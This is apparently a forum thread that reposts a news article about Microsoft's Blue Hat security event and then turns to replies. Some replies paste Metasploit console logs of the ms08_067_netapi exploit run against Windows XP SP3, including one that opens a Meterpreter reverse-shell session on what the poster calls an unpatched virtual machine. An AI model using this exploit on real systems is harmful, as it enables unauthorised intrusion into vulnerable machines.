Jump to content

Blue Hat


okiwan
 Share

Recommended Posts

Microsoft to Host Hacker Meetings

Company plans to make its Blue Hat security event a twice-yearly confab.

Microsoft is working on plans to make a recent hacker meeting held on its Redmond, Washington, campus a twice-yearly event, according to a spokesperson for the vendor's security group.

The company plans to host another Blue Hat security event in the fall, though no specific date for it has been set, Stephen Toulouse, a program manager in Microsoft's security unit, said on Monday.

"We're looking at doing this again in the future," he said of the two-day event, which was held in March. "As we continue to engage with security researchers, we've become more comfortable getting into these face-to-face interactions with them."

The Blue Hat event's name is a reference to the annual Black Hat security conference, with the color in the title changed to blue because that's the color of the badges Microsoft employees wear on campus. This year's U.S. Black Hat meeting was held last week in Las Vegas.

Eye-Opening Demonstrations

In sessions at the initial Microsoft Blue Hat event, security researchers demonstrated to Microsoft executives and developers how flaws in the software giant's products could be exploited.

In one presentation, hackers set up a wireless network and showed how a laptop running Windows XP Service Pack 2 could be lured into joining a potentially malicious network, Toulouse said.

Demonstrating these kinds of possible security holes hit home with product developers, which is why Microsoft wants to host the event regularly, Toulouse said.

"There was a moment where everything just stopped," Toulouse said of the wireless network presentation. "You've got guys in the audience who wrote that code . . . Some of the things developers coming out of the talks were expressing [were] great ideas to go off and change the way products are [developed] to make sure this won't happen again."

This kind of reaction from developers is in line with Microsoft's goal for the Blue Hat events, which is to help make Microsoft's product line as a whole more secure, he added.

Edited by okiwan
Link to comment
Share on other sites

In one presentation, hackers set up a wireless network and showed how a laptop running Windows XP Service Pack 2 could be lured into joining a potentially malicious network

lol. i can picture the whole audience gasping. like "oohh nooo good thing we upgraded to SP3!"

Edited by okiwan
Link to comment
Share on other sites

ms08_067_netapi I believe still works on SP3

[*] Started reverse handler on 10.10.1.41:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Attempting to trigger the vulnerability...

[*] Exploit completed, but no session was created.

msf exploit(ms08_067_netapi) >

fail :| lol

Link to comment
Share on other sites

I would suspect this is very 'by invitation only' because the last thing M$ would want is for someone becoming too overzealous in showing off his techniques, gaining access to the servers that work with account data and making it out of the country with MILLIONS. Not very un-feasible if it's hosted on the Microsoft Campus.

Link to comment
Share on other sites

Doesn't anyone here think that getting the people who wrote Windows et al together with the hackers who exploit it is a good thing? Because maybe they will look at the way Windows is designed from a different viewpoint? Or are we all content with snide "M$ lulz" comments?

Link to comment
Share on other sites

[*] Started reverse handler on 10.10.1.41:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Attempting to trigger the vulnerability...

[*] Exploit completed, but no session was created.

msf exploit(ms08_067_netapi) >

fail :| lol

uh huh

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.106:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (748544 bytes) to 192.168.1.181

[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.181:1072) at 2010-08-20 12:27:54 -0600

meterpreter >

Link to comment
Share on other sites

uh huh

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.106:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (748544 bytes) to 192.168.1.181

[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.181:1072) at 2010-08-20 12:27:54 -0600

meterpreter >

Was this box fully patched?

Link to comment
Share on other sites

Was this box fully patched?

It was not, I rarely, if every, update VMs. After updating to test it, I also updated my BT4 install/metasploit, and now metasploit won't run. So I'll take your word that ms08_067 won't work on a fully patched XP SP3 machine, but for those wondering, it works on an un-patched one =P.

Link to comment
Share on other sites

It was not, I rarely, if every, update VMs. After updating to test it, I also updated my BT4 install/metasploit, and now metasploit won't run. So I'll take your word that ms08_067 won't work on a fully patched XP SP3 machine, but for those wondering, it works on an un-patched one =P.

oh ok I gotcha :)

Link to comment
Share on other sites

@VaKo - I think this is a GREAT idea slap some stank on the devs who are supposed to be making sure exploits are hard. But either way, we all know no matter what there will always be an exploit. Just depends on how feasible it is to make a script kiddy port :/

Link to comment
Share on other sites

the only way to be safe of all exploits is to turn your computer off.

nope now you still have the pyschial accsess to pwn the box also only way to have a computer safe if u keep it in a safe and incase the safe in cement after you destroy the lock on the safe

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...